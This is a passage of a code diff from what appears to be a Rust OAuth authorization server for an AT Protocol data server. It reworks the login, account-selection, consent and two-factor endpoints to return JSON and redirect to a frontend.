- { 865 - Ok(Some(ch)) => channel_display_name(ch).to_string(), 866 - Ok(None) | Err(_) => "email".to_string(), 867 - }; 868 - let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await 869 - { 870 - Ok(Some(d)) => d, 871 - Ok(None) => { 872 - return Html(templates::error_page( 873 - "invalid_request", 874 - Some("Authorization request not found. Please start over."), 875 - )) 876 - .into_response(); 877 - } 878 - Err(_) => { 879 - return Html(templates::error_page( 880 - "server_error", 881 - Some("An error occurred. Please try again."), 882 - )) 883 - .into_response(); 884 - } 885 - }; 886 - return Html(templates::two_factor_page( 887 - &form.request_uri, 888 - &channel, 889 - Some("Invalid verification code. Please try again."), 890 - )) 891 - .into_response(); 892 } 893 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 894 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 895 Ok(Some(d)) => d, 896 Ok(None) => { 897 - return Html(templates::error_page( 898 "invalid_request", 899 - Some("Authorization request not found."), 900 - )) 901 - .into_response(); 902 } 903 Err(_) => { 904 - return Html(templates::error_page( 905 "server_error", 906 - Some("An error occurred."), 907 - )) 908 - .into_response(); 909 } 910 }; 911 let code = Code::generate(); ··· 920 .await 921 .is_err() 922 { 923 - return Html(templates::error_page( 924 "server_error", 925 - Some("An error occurred. Please try again."), 926 - )) 927 - .into_response(); 928 } 929 let redirect_url = build_success_redirect( 930 &request_data.parameters.redirect_uri, 931 &code.0, 932 request_data.parameters.state.as_deref(), 933 ); 934 - redirect_see_other(&redirect_url) 935 }
··· 1 use crate::comms::{CommsChannel, channel_display_name, enqueue_2fa_code}; 2 use crate::oauth::{ 3 + Code, DeviceData, DeviceId, OAuthError, SessionId, client::ClientMetadataCache, db, 4 }; 5 use crate::state::{AppState, RateLimitKind}; 6 use axum::{ 7 + Json, 8 extract::{Query, State}, 9 http::{ 10 HeaderMap, StatusCode, 11 header::{LOCATION, SET_COOKIE}, 12 }, 13 + response::{IntoResponse, Response}, 14 }; 15 use chrono::Utc; 16 use serde::{Deserialize, Serialize}; ··· 23 (StatusCode::SEE_OTHER, [(LOCATION, uri.to_string())]).into_response() 24 } 25 26 + fn redirect_to_frontend_error(error: &str, description: &str) -> Response { 27 + redirect_see_other(&format!( 28 + "/#/oauth/error?error={}&error_description={}", 29 + url_encode(error), 30 + url_encode(description) 31 + )) 32 + } 33 + 34 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 35 headers 36 .get("cookie") ··· 49 fn extract_client_ip(headers: &HeaderMap) -> String { 50 if let Some(forwarded) = headers.get("x-forwarded-for") 51 && let Ok(value) = forwarded.to_str() 52 + && let Some(first_ip) = value.split(',').next() 53 + { 54 + return first_ip.trim().to_string(); 55 + } 56 if let Some(real_ip) = headers.get("x-real-ip") 57 + && let Ok(value) = real_ip.to_str() 58 + { 59 + return value.trim().to_string(); 60 + } 61 "0.0.0.0".to_string() 62 } 63 ··· 125 None => { 126 if wants_json(&headers) { 127 return ( 128 + StatusCode::BAD_REQUEST, 129 Json(serde_json::json!({ 130 "error": "invalid_request", 131 "error_description": "Missing request_uri parameter. Use PAR to initiate authorization." 132 })), 133 ).into_response(); 134 } 135 + return redirect_to_frontend_error( 136 + "invalid_request", 137 + "Missing request_uri parameter. Use PAR to initiate authorization.", 138 + ); 139 } 140 }; 141 let request_data = match db::get_authorization_request(&state.db, &request_uri).await { ··· 143 Ok(None) => { 144 if wants_json(&headers) { 145 return ( 146 + StatusCode::BAD_REQUEST, 147 Json(serde_json::json!({ 148 "error": "invalid_request", 149 "error_description": "Invalid or expired request_uri. Please start a new authorization request." 150 })), 151 ).into_response(); 152 } 153 + return redirect_to_frontend_error( 154 + "invalid_request", 155 + "Invalid or expired request_uri. Please start a new authorization request.", 156 + ); 157 } 158 Err(e) => { 159 if wants_json(&headers) { 160 return ( 161 + StatusCode::INTERNAL_SERVER_ERROR, 162 Json(serde_json::json!({ 163 "error": "server_error", 164 "error_description": format!("Database error: {:?}", e) ··· 166 ) 167 .into_response(); 168 } 169 + return redirect_to_frontend_error("server_error", "A database error occurred."); 170 } 171 }; 172 if request_data.expires_at < Utc::now() { 173 let _ = db::delete_authorization_request(&state.db, &request_uri).await; 174 if wants_json(&headers) { 175 return ( 176 + StatusCode::BAD_REQUEST, 177 Json(serde_json::json!({ 178 "error": "invalid_request", 179 "error_description": "Authorization request has expired. Please start a new request." 180 })), 181 ).into_response(); 182 } 183 + return redirect_to_frontend_error( 184 + "invalid_request", 185 + "Authorization request has expired. Please start a new request.", 186 + ); 187 } 188 let client_cache = ClientMetadataCache::new(3600); 189 let client_name = client_cache ··· 205 let force_new_account = query.new_account.unwrap_or(false); 206 if !force_new_account 207 && let Some(device_id) = extract_device_cookie(&headers) 208 + && let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await 209 + && !accounts.is_empty() 210 + { 211 + return redirect_see_other(&format!( 212 + "/#/oauth/accounts?request_uri={}", 213 + url_encode(&request_uri) 214 + )); 215 + } 216 + redirect_see_other(&format!( 217 + "/#/oauth/login?request_uri={}", 218 + url_encode(&request_uri) 219 )) 220 } 221 222 pub async fn authorize_get_json( ··· 245 })) 246 } 247 248 + #[derive(Debug, Serialize)] 249 + pub struct AccountInfo { 250 + pub did: String, 251 + pub handle: String, 252 + #[serde(skip_serializing_if = "Option::is_none")] 253 + pub email: Option<String>, 254 + } 255 + 256 + #[derive(Debug, Serialize)] 257 + pub struct AccountsResponse { 258 + pub accounts: Vec<AccountInfo>, 259 + pub request_uri: String, 260 + } 261 + 262 + fn mask_email(email: &str) -> String { 263 + if let Some(at_pos) = email.find('@') { 264 + let local = &email[..at_pos]; 265 + let domain = &email[at_pos..]; 266 + if local.len() <= 2 { 267 + format!("{}***{}", local.chars().next().unwrap_or('*'), domain) 268 + } else { 269 + let first = local.chars().next().unwrap_or('*'); 270 + let last = local.chars().last().unwrap_or('*'); 271 + format!("{}***{}{}", first, last, domain) 272 + } 273 + } else { 274 + "***".to_string() 275 + } 276 + } 277 + 278 + pub async fn authorize_accounts( 279 + State(state): State<AppState>, 280 + headers: HeaderMap, 281 + Query(query): Query<AuthorizeQuery>, 282 + ) -> Response { 283 + let request_uri = match query.request_uri { 284 + Some(uri) => uri, 285 + None => { 286 + return ( 287 + StatusCode::BAD_REQUEST, 288 + Json(serde_json::json!({ 289 + "error": "invalid_request", 290 + "error_description": "Missing request_uri parameter" 291 + })), 292 + ) 293 + .into_response(); 294 + } 295 + }; 296 + let device_id = match extract_device_cookie(&headers) { 297 + Some(id) => id, 298 + None => { 299 + return Json(AccountsResponse { 300 + accounts: vec![], 301 + request_uri, 302 + }) 303 + .into_response(); 304 + } 305 + }; 306 + let accounts = match db::get_device_accounts(&state.db, &device_id).await { 307 + Ok(accts) => accts, 308 + Err(_) => { 309 + return Json(AccountsResponse { 310 + accounts: vec![], 311 + request_uri, 312 + }) 313 + .into_response(); 314 + } 315 + }; 316 + let account_infos: Vec<AccountInfo> = accounts 317 + .into_iter() 318 + .map(|row| AccountInfo { 319 + did: row.did, 320 + handle: row.handle, 321 + email: row.email.map(|e| mask_email(&e)), 322 + }) 323 + .collect(); 324 + Json(AccountsResponse { 325 + accounts: account_infos, 326 + request_uri, 327 + }) 328 + .into_response() 329 + } 330 + 331 pub async fn authorize_post( 332 State(state): State<AppState>, 333 headers: HeaderMap, 334 + Json(form): Json<AuthorizeSubmit>, 335 ) -> Response { 336 let json_response = wants_json(&headers); 337 let client_ip = extract_client_ip(&headers); ··· 350 ) 351 .into_response(); 352 } 353 + return redirect_to_frontend_error( 354 + "RateLimitExceeded", 355 + "Too many login attempts. Please try again later.", 356 + ); 357 } 358 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 359 Ok(Some(data)) => data, ··· 368 ) 369 .into_response(); 370 } 371 + return redirect_to_frontend_error( 372 "invalid_request", 373 + "Invalid or expired request_uri. Please start a new authorization request.", 374 + ); 375 } 376 Err(e) => { 377 if json_response { ··· 384 ) 385 .into_response(); 386 } 387 + return redirect_to_frontend_error("server_error", &format!("Database error: {:?}", e)); 388 } 389 }; 390 if request_data.expires_at < Utc::now() { ··· 399 ) 400 .into_response(); 401 } 402 + return redirect_to_frontend_error( 403 "invalid_request", 404 + "Authorization request has expired. Please start a new request.", 405 + ); 406 } 407 let show_login_error = |error_msg: &str, json: bool| -> Response { 408 if json { 409 return ( ··· 415 ) 416 .into_response(); 417 } 418 + redirect_see_other(&format!( 419 + "/#/oauth/login?request_uri={}&error={}", 420 + url_encode(&form.request_uri), 421 + url_encode(error_msg) 422 )) 423 }; 424 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 425 let normalized_username = form.username.trim(); ··· 455 { 456 Ok(Some(u)) => u, 457 Ok(None) => { 458 + let _ = bcrypt::verify( 459 + &form.password, 460 + "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK", 461 + ); 462 return show_login_error("Invalid handle/email or password.", json_response); 463 } 464 Err(_) => return show_login_error("An error occurred. Please try again.", json_response), ··· 474 || user.telegram_verified 475 || user.signal_verified; 476 if !is_verified { 477 + return show_login_error( 478 + "Please verify your account before logging in.", 479 + json_response, 480 + ); 481 } 482 let password_valid = match bcrypt::verify(&form.password, &user.password_hash) { 483 Ok(valid) => valid, ··· 502 ); 503 } 504 let channel_name = channel_display_name(user.preferred_comms_channel); 505 + if json_response { 506 + return Json(serde_json::json!({ 507 + "needs_2fa": true, 508 + "channel": channel_name 509 + })) 510 + .into_response(); 511 + } 512 + return redirect_see_other(&format!( 513 + "/#/oauth/2fa?request_uri={}&channel={}", 514 url_encode(&form.request_uri), 515 url_encode(channel_name) 516 + )); 517 } 518 Err(_) => { 519 return show_login_error("An error occurred. Please try again.", json_response); 520 } 521 } 522 } 523 let mut device_id: Option<String> = extract_device_cookie(&headers); 524 let mut new_cookie: Option<String> = None; 525 if form.remember_device { ··· 544 }; 545 let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await; 546 } 547 + if db::set_authorization_did( 548 + &state.db, 549 + &form.request_uri, 550 + &user.did, 551 + device_id.as_deref(), 552 + ) 553 + .await 554 + .is_err() 555 + { 556 + return show_login_error("An error occurred. Please try again.", json_response); 557 + } 558 + let requested_scope_str = request_data 559 + .parameters 560 + .scope 561 + .as_deref() 562 + .unwrap_or("atproto"); 563 + let requested_scopes: Vec<String> = requested_scope_str 564 + .split_whitespace() 565 + .map(|s| s.to_string()) 566 + .collect(); 567 + let needs_consent = db::should_show_consent( 568 + &state.db, 569 + &user.did, 570 + &request_data.parameters.client_id, 571 + &requested_scopes, 572 + ) 573 + .await 574 + .unwrap_or(true); 575 + if needs_consent { 576 + let consent_url = format!( 577 + "/#/oauth/consent?request_uri={}", 578 + url_encode(&form.request_uri) 579 + ); 580 + if json_response { 581 + if let Some(cookie) = new_cookie { 582 + return ( 583 + StatusCode::OK, 584 + [(SET_COOKIE, cookie)], 585 + Json(serde_json::json!({"redirect_uri": consent_url})), 586 + ) 587 + .into_response(); 588 + } 589 + return Json(serde_json::json!({"redirect_uri": consent_url})).into_response(); 590 + } 591 + if let Some(cookie) = new_cookie { 592 + return ( 593 + StatusCode::SEE_OTHER, 594 + [(SET_COOKIE, cookie), (LOCATION, consent_url)], 595 + ) 596 + .into_response(); 597 + } 598 + return redirect_see_other(&consent_url); 599 + } 600 + let code = Code::generate(); 601 if db::update_authorization_request( 602 &state.db, 603 &form.request_uri, ··· 614 &request_data.parameters.redirect_uri, 615 &code.0, 616 request_data.parameters.state.as_deref(), 617 + request_data.parameters.response_mode.as_deref(), 618 ); 619 + if json_response { 620 + if let Some(cookie) = new_cookie { 621 + ( 622 + StatusCode::OK, 623 + [(SET_COOKIE, cookie)], 624 + Json(serde_json::json!({"redirect_uri": redirect_url})), 625 + ) 626 + .into_response() 627 + } else { 628 + Json(serde_json::json!({"redirect_uri": redirect_url})).into_response() 629 + } 630 + } else if let Some(cookie) = new_cookie { 631 ( 632 StatusCode::SEE_OTHER, 633 [(SET_COOKIE, cookie), (LOCATION, redirect_url)], ··· 641 pub async fn authorize_select( 642 State(state): State<AppState>, 643 headers: HeaderMap, 644 + Json(form): Json<AuthorizeSelectSubmit>, 645 ) -> Response { 646 + let json_error = |status: StatusCode, error: &str, description: &str| -> Response { 647 + ( 648 + status, 649 + Json(serde_json::json!({ 650 + "error": error, 651 + "error_description": description 652 + })), 653 + ) 654 + .into_response() 655 + }; 656 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 657 Ok(Some(data)) => data, 658 Ok(None) => { 659 + return json_error( 660 + StatusCode::BAD_REQUEST, 661 "invalid_request", 662 + "Invalid or expired request_uri. Please start a new authorization request.", 663 + ); 664 } 665 Err(_) => { 666 + return json_error( 667 + StatusCode::INTERNAL_SERVER_ERROR, 668 "server_error", 669 + "An error occurred. Please try again.", 670 + ); 671 } 672 }; 673 if request_data.expires_at < Utc::now() { 674 let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 675 + return json_error( 676 + StatusCode::BAD_REQUEST, 677 "invalid_request", 678 + "Authorization request has expired. Please start a new request.", 679 + ); 680 } 681 let device_id = match extract_device_cookie(&headers) { 682 Some(id) => id, 683 None => { 684 + return json_error( 685 + StatusCode::BAD_REQUEST, 686 "invalid_request", 687 + "No device session found. Please sign in.", 688 + ); 689 } 690 }; 691 let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await { 692 Ok(valid) => valid, 693 Err(_) => { 694 + return json_error( 695 + StatusCode::INTERNAL_SERVER_ERROR, 696 "server_error", 697 + "An error occurred. Please try again.", 698 + ); 699 } 700 }; 701 if !account_valid { 702 + return json_error( 703 + StatusCode::FORBIDDEN, 704 "access_denied", 705 + "This account is not available on this device. Please sign in.", 706 + ); 707 } 708 let user = match sqlx::query!( 709 r#" ··· 720 { 721 Ok(Some(u)) => u, 722 Ok(None) => { 723 + return json_error( 724 + StatusCode::FORBIDDEN, 725 "access_denied", 726 + "Account not found. Please sign in.", 727 + ); 728 } 729 Err(_) => { 730 + return json_error( 731 + StatusCode::INTERNAL_SERVER_ERROR, 732 "server_error", 733 + "An error occurred. Please try again.", 734 + ); 735 } 736 }; 737 let is_verified = user.email_verified ··· 739 || user.telegram_verified 740 || user.signal_verified; 741 if !is_verified { 742 + return json_error( 743 + StatusCode::FORBIDDEN, 744 "access_denied", 745 + "Please verify your account before logging in.", 746 + ); 747 } 748 if user.two_factor_enabled { 749 let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; ··· 761 ); 762 } 763 let channel_name = channel_display_name(user.preferred_comms_channel); 764 + return Json(serde_json::json!({ 765 + "needs_2fa": true, 766 + "channel": channel_name 767 + })) 768 + .into_response(); 769 } 770 Err(_) => { 771 + return json_error( 772 + StatusCode::INTERNAL_SERVER_ERROR, 773 "server_error", 774 + "An error occurred. Please try again.", 775 + ); 776 } 777 } 778 } ··· 788 .await 789 .is_err() 790 { 791 + return json_error( 792 + StatusCode::INTERNAL_SERVER_ERROR, 793 "server_error", 794 + "An error occurred. Please try again.", 795 + ); 796 } 797 let redirect_url = build_success_redirect( 798 &request_data.parameters.redirect_uri, 799 &code.0, 800 request_data.parameters.state.as_deref(), 801 + request_data.parameters.response_mode.as_deref(), 802 ); 803 + Json(serde_json::json!({ 804 + "redirect_uri": redirect_url 805 + })) 806 + .into_response() 807 } 808 809 + fn build_success_redirect( 810 + redirect_uri: &str, 811 + code: &str, 812 + state: Option<&str>, 813 + response_mode: Option<&str>, 814 + ) -> String { 815 let mut redirect_url = redirect_uri.to_string(); 816 + let use_fragment = response_mode == Some("fragment"); 817 + let separator = if use_fragment { 818 + '#' 819 + } else if redirect_url.contains('?') { 820 + '&' 821 + } else { 822 + '?' 823 + }; 824 redirect_url.push(separator); 825 redirect_url.push_str(&format!("code={}", url_encode(code))); 826 if let Some(req_state) = state { ··· 842 843 pub async fn authorize_deny( 844 State(state): State<AppState>, 845 + Json(form): Json<AuthorizeDenyForm>, 846 + ) -> Response { 847 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 848 + Ok(Some(data)) => data, 849 + Ok(None) => { 850 + return ( 851 + StatusCode::BAD_REQUEST, 852 + Json(serde_json::json!({ 853 + "error": "invalid_request", 854 + "error_description": "Invalid request_uri" 855 + })), 856 + ) 857 + .into_response(); 858 + } 859 + Err(_) => { 860 + return ( 861 + StatusCode::INTERNAL_SERVER_ERROR, 862 + Json(serde_json::json!({ 863 + "error": "server_error", 864 + "error_description": "An error occurred" 865 + })), 866 + ) 867 + .into_response(); 868 + } 869 + }; 870 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 871 let redirect_uri = &request_data.parameters.redirect_uri; 872 let mut redirect_url = redirect_uri.to_string(); 873 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 877 if let Some(state) = &request_data.parameters.state { 878 redirect_url.push_str(&format!("&state={}", url_encode(state))); 879 } 880 + Json(serde_json::json!({ 881 + "redirect_uri": redirect_url 882 + })) 883 + .into_response() 884 } 885 886 #[derive(Debug, Deserialize)] ··· 909 let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await { 910 Ok(Some(c)) => c, 911 Ok(None) => { 912 + return redirect_to_frontend_error( 913 "invalid_request", 914 + "No 2FA challenge found. Please start over.", 915 + ); 916 } 917 Err(_) => { 918 + return redirect_to_frontend_error( 919 "server_error", 920 + "An error occurred. Please try again.", 921 + ); 922 } 923 }; 924 if challenge.expires_at < Utc::now() { 925 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 926 + return redirect_to_frontend_error( 927 "invalid_request", 928 + "2FA code has expired. Please start over.", 929 + ); 930 } 931 let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 932 Ok(Some(d)) => d, 933 Ok(None) => { 934 + return redirect_to_frontend_error( 935 "invalid_request", 936 + "Authorization request not found. Please start over.", 937 + ); 938 } 939 Err(_) => { 940 + return redirect_to_frontend_error( 941 "server_error", 942 + "An error occurred. Please try again.", 943 + ); 944 } 945 }; 946 let channel = query.channel.as_deref().unwrap_or("email"); 947 + redirect_see_other(&format!( 948 + "/#/oauth/2fa?request_uri={}&channel={}", 949 + url_encode(&query.request_uri), 950 + url_encode(channel) 951 )) 952 + } 953 + 954 + #[derive(Debug, Serialize)] 955 + pub struct ScopeInfo { 956 + pub scope: String, 957 + pub category: String, 958 + pub required: bool, 959 + pub description: String, 960 + pub display_name: String, 961 + pub granted: Option<bool>, 962 + } 963 + 964 + #[derive(Debug, Serialize)] 965 + pub struct ConsentResponse { 966 + pub request_uri: String, 967 + pub client_id: String, 968 + pub client_name: Option<String>, 969 + pub client_uri: Option<String>, 970 + pub logo_uri: Option<String>, 971 + pub scopes: Vec<ScopeInfo>, 972 + pub show_consent: bool, 973 + pub did: String, 974 + } 975 + 976 + #[derive(Debug, Deserialize)] 977 + pub struct ConsentQuery { 978 + pub request_uri: String, 979 + } 980 + 981 + #[derive(Debug, Deserialize)] 982 + pub struct ConsentSubmit { 983 + pub request_uri: String, 984 + pub approved_scopes: Vec<String>, 985 + pub remember: bool, 986 + } 987 + 988 + pub async fn consent_get( 989 + State(state): State<AppState>, 990 + Query(query): Query<ConsentQuery>, 991 + ) -> Response { 992 + let request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 993 + Ok(Some(data)) => data, 994 + Ok(None) => { 995 + return ( 996 + StatusCode::BAD_REQUEST, 997 + Json(serde_json::json!({ 998 + "error": "invalid_request", 999 + "error_description": "Invalid or expired request_uri" 1000 + })), 1001 + ) 1002 + .into_response(); 1003 + } 1004 + Err(e) => { 1005 + return ( 1006 + StatusCode::INTERNAL_SERVER_ERROR, 1007 + Json(serde_json::json!({ 1008 + "error": "server_error", 1009 + "error_description": format!("Database error: {:?}", e) 1010 + })), 1011 + ) 1012 + .into_response(); 1013 + } 1014 + }; 1015 + if request_data.expires_at < Utc::now() { 1016 + let _ = db::delete_authorization_request(&state.db, &query.request_uri).await; 1017 + return ( 1018 + StatusCode::BAD_REQUEST, 1019 + Json(serde_json::json!({ 1020 + "error": "invalid_request", 1021 + "error_description": "Authorization request has expired" 1022 + })), 1023 + ) 1024 + .into_response(); 1025 + } 1026 + let did = match &request_data.did { 1027 + Some(d) => d.clone(), 1028 + None => { 1029 + return ( 1030 + StatusCode::FORBIDDEN, 1031 + Json(serde_json::json!({ 1032 + "error": "access_denied", 1033 + "error_description": "Not authenticated" 1034 + })), 1035 + ) 1036 + .into_response(); 1037 + } 1038 + }; 1039 + let client_cache = ClientMetadataCache::new(3600); 1040 + let client_metadata = client_cache 1041 + .get(&request_data.parameters.client_id) 1042 + .await 1043 + .ok(); 1044 + let requested_scope_str = request_data 1045 + .parameters 1046 + .scope 1047 + .as_deref() 1048 + .unwrap_or("atproto"); 1049 + let requested_scopes: Vec<&str> = requested_scope_str.split_whitespace().collect(); 1050 + let preferences = 1051 + db::get_scope_preferences(&state.db, &did, &request_data.parameters.client_id) 1052 + .await 1053 + .unwrap_or_default(); 1054 + let pref_map: std::collections::HashMap<_, _> = preferences 1055 + .iter() 1056 + .map(|p| (p.scope.as_str(), p.granted)) 1057 + .collect(); 1058 + let requested_scope_strings: Vec<String> = 1059 + requested_scopes.iter().map(|s| s.to_string()).collect(); 1060 + let show_consent = db::should_show_consent( 1061 + &state.db, 1062 + &did, 1063 + &request_data.parameters.client_id, 1064 + &requested_scope_strings, 1065 + ) 1066 + .await 1067 + .unwrap_or(true); 1068 + let mut scopes = Vec::new(); 1069 + for scope in &requested_scopes { 1070 + let (category, required, description, display_name) = 1071 + if let Some(def) = crate::oauth::scopes::SCOPE_DEFINITIONS.get(*scope) { 1072 + ( 1073 + def.category.display_name().to_string(), 1074 + def.required, 1075 + def.description.to_string(), 1076 + def.display_name.to_string(), 1077 + ) 1078 + } else if scope.starts_with("ref:") { 1079 + ( 1080 + "Reference".to_string(), 1081 + false, 1082 + "Referenced scope".to_string(), 1083 + scope.to_string(), 1084 + ) 1085 + } else { 1086 + ( 1087 + "Other".to_string(), 1088 + false, 1089 + format!("Access to {}", scope), 1090 + scope.to_string(), 1091 + ) 1092 + }; 1093 + let granted = pref_map.get(*scope).copied(); 1094 + scopes.push(ScopeInfo { 1095 + scope: scope.to_string(), 1096 + category, 1097 + required, 1098 + description, 1099 + display_name, 1100 + granted, 1101 + }); 1102 + } 1103 + Json(ConsentResponse { 1104 + request_uri: query.request_uri.clone(), 1105 + client_id: request_data.parameters.client_id.clone(), 1106 + client_name: client_metadata.as_ref().and_then(|m| m.client_name.clone()), 1107 + client_uri: client_metadata.as_ref().and_then(|m| m.client_uri.clone()), 1108 + logo_uri: client_metadata.as_ref().and_then(|m| m.logo_uri.clone()), 1109 + scopes, 1110 + show_consent, 1111 + did, 1112 + }) 1113 + .into_response() 1114 + } 1115 + 1116 + pub async fn consent_post( 1117 + State(state): State<AppState>, 1118 + Json(form): Json<ConsentSubmit>, 1119 + ) -> Response { 1120 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 1121 + Ok(Some(data)) => data, 1122 + Ok(None) => { 1123 + return ( 1124 + StatusCode::BAD_REQUEST, 1125 + Json(serde_json::json!({ 1126 + "error": "invalid_request", 1127 + "error_description": "Invalid or expired request_uri" 1128 + })), 1129 + ) 1130 + .into_response(); 1131 + } 1132 + Err(e) => { 1133 + return ( 1134 + StatusCode::INTERNAL_SERVER_ERROR, 1135 + Json(serde_json::json!({ 1136 + "error": "server_error", 1137 + "error_description": format!("Database error: {:?}", e) 1138 + })), 1139 + ) 1140 + .into_response(); 1141 + } 1142 + }; 1143 + if request_data.expires_at < Utc::now() { 1144 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 1145 + return ( 1146 + StatusCode::BAD_REQUEST, 1147 + Json(serde_json::json!({ 1148 + "error": "invalid_request", 1149 + "error_description": "Authorization request has expired" 1150 + })), 1151 + ) 1152 + .into_response(); 1153 + } 1154 + let did = match &request_data.did { 1155 + Some(d) => d.clone(), 1156 + None => { 1157 + return ( 1158 + StatusCode::FORBIDDEN, 1159 + Json(serde_json::json!({ 1160 + "error": "access_denied", 1161 + "error_description": "Not authenticated" 1162 + })), 1163 + ) 1164 + .into_response(); 1165 + } 1166 + }; 1167 + let requested_scope_str = request_data 1168 + .parameters 1169 + .scope 1170 + .as_deref() 1171 + .unwrap_or("atproto"); 1172 + let requested_scopes: Vec<&str> = requested_scope_str.split_whitespace().collect(); 1173 + let has_granular_scopes = requested_scopes.iter().any(|s| { 1174 + s.starts_with("repo:") 1175 + || s.starts_with("blob:") 1176 + || s.starts_with("rpc:") 1177 + || s.starts_with("account:") 1178 + || s.starts_with("identity:") 1179 + }); 1180 + let user_denied_some_granular = has_granular_scopes 1181 + && requested_scopes 1182 + .iter() 1183 + .filter(|s| { 1184 + s.starts_with("repo:") 1185 + || s.starts_with("blob:") 1186 + || s.starts_with("rpc:") 1187 + || s.starts_with("account:") 1188 + || s.starts_with("identity:") 1189 + }) 1190 + .any(|s| !form.approved_scopes.contains(&s.to_string())); 1191 + let atproto_was_requested = requested_scopes.contains(&"atproto"); 1192 + if atproto_was_requested 1193 + && !has_granular_scopes 1194 + && !form.approved_scopes.contains(&"atproto".to_string()) 1195 + { 1196 + return ( 1197 + StatusCode::BAD_REQUEST, 1198 + Json(serde_json::json!({ 1199 + "error": "invalid_request", 1200 + "error_description": "The atproto scope was requested and must be approved" 1201 + })), 1202 + ) 1203 + .into_response(); 1204 + } 1205 + let final_approved: Vec<String> = if user_denied_some_granular { 1206 + form.approved_scopes 1207 + .iter() 1208 + .filter(|s| *s != "atproto") 1209 + .cloned() 1210 + .collect() 1211 + } else { 1212 + form.approved_scopes.clone() 1213 + }; 1214 + if final_approved.is_empty() { 1215 + return ( 1216 + StatusCode::BAD_REQUEST, 1217 + Json(serde_json::json!({ 1218 + "error": "invalid_request", 1219 + "error_description": "At least one scope must be approved" 1220 + })), 1221 + ) 1222 + .into_response(); 1223 + } 1224 + let approved_scope_str = final_approved.join(" "); 1225 + let has_valid_scope = final_approved.iter().all(|s| { 1226 + s == "atproto" 1227 + || s == "transition:generic" 1228 + || s == "transition:chat.bsky" 1229 + || s == "transition:email" 1230 + || s.starts_with("repo:") 1231 + || s.starts_with("blob:") 1232 + || s.starts_with("rpc:") 1233 + || s.starts_with("account:") 1234 + || s.starts_with("include:") 1235 + }); 1236 + if !has_valid_scope { 1237 + return ( 1238 + StatusCode::BAD_REQUEST, 1239 + Json(serde_json::json!({ 1240 + "error": "invalid_request", 1241 + "error_description": "Invalid scope format" 1242 + })), 1243 + ) 1244 + .into_response(); 1245 + } 1246 + if form.remember { 1247 + let preferences: Vec<db::ScopePreference> = requested_scopes 1248 + .iter() 1249 + .map(|s| db::ScopePreference { 1250 + scope: s.to_string(), 1251 + granted: form.approved_scopes.contains(&s.to_string()), 1252 + }) 1253 + .collect(); 1254 + let _ = db::upsert_scope_preferences( 1255 + &state.db, 1256 + &did, 1257 + &request_data.parameters.client_id, 1258 + &preferences, 1259 + ) 1260 + .await; 1261 + } 1262 + if let Err(e) = 1263 + db::update_request_scope(&state.db, &form.request_uri, &approved_scope_str).await 1264 + { 1265 + tracing::warn!("Failed to update request scope: {:?}", e); 1266 + } 1267 + let code = Code::generate(); 1268 + if db::update_authorization_request( 1269 + &state.db, 1270 + &form.request_uri, 1271 + &did, 1272 + request_data.device_id.as_deref(), 1273 + &code.0, 1274 + ) 1275 + .await 1276 + .is_err() 1277 + { 1278 + return ( 1279 + StatusCode::INTERNAL_SERVER_ERROR, 1280 + Json(serde_json::json!({ 1281 + "error": "server_error", 1282 + "error_description": "Failed to complete authorization" 1283 + })), 1284 + ) 1285 + .into_response(); 1286 + } 1287 + let redirect_url = build_success_redirect( 1288 + &request_data.parameters.redirect_uri, 1289 + &code.0, 1290 + request_data.parameters.state.as_deref(), 1291 + request_data.parameters.response_mode.as_deref(), 1292 + ); 1293 + Json(serde_json::json!({ 1294 + "redirect_uri": redirect_url 1295 + })) 1296 .into_response() 1297 } 1298 1299 pub async fn authorize_2fa_post( 1300 State(state): State<AppState>, 1301 headers: HeaderMap, 1302 + Json(form): Json<Authorize2faSubmit>, 1303 ) -> Response { 1304 + let json_error = |status: StatusCode, error: &str, description: &str| -> Response { 1305 + ( 1306 + status, 1307 + Json(serde_json::json!({ 1308 + "error": error, 1309 + "error_description": description 1310 + })), 1311 + ) 1312 + .into_response() 1313 + }; 1314 let client_ip = extract_client_ip(&headers); 1315 if !state 1316 .check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip) 1317 .await 1318 { 1319 tracing::warn!(ip = %client_ip, "OAuth 2FA rate limit exceeded"); 1320 + return json_error( 1321 + StatusCode::TOO_MANY_REQUESTS, 1322 + "RateLimitExceeded", 1323 + "Too many attempts. Please try again later.", 1324 + ); 1325 } 1326 let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await { 1327 Ok(Some(c)) => c, 1328 Ok(None) => { 1329 + return json_error( 1330 + StatusCode::BAD_REQUEST, 1331 "invalid_request", 1332 + "No 2FA challenge found. Please start over.", 1333 + ); 1334 } 1335 Err(_) => { 1336 + return json_error( 1337 + StatusCode::INTERNAL_SERVER_ERROR, 1338 "server_error", 1339 + "An error occurred. Please try again.", 1340 + ); 1341 } 1342 }; 1343 if challenge.expires_at < Utc::now() { 1344 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 1345 + return json_error( 1346 + StatusCode::BAD_REQUEST, 1347 "invalid_request", 1348 + "2FA code has expired. Please start over.", 1349 + ); 1350 } 1351 if challenge.attempts >= MAX_2FA_ATTEMPTS { 1352 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 1353 + return json_error( 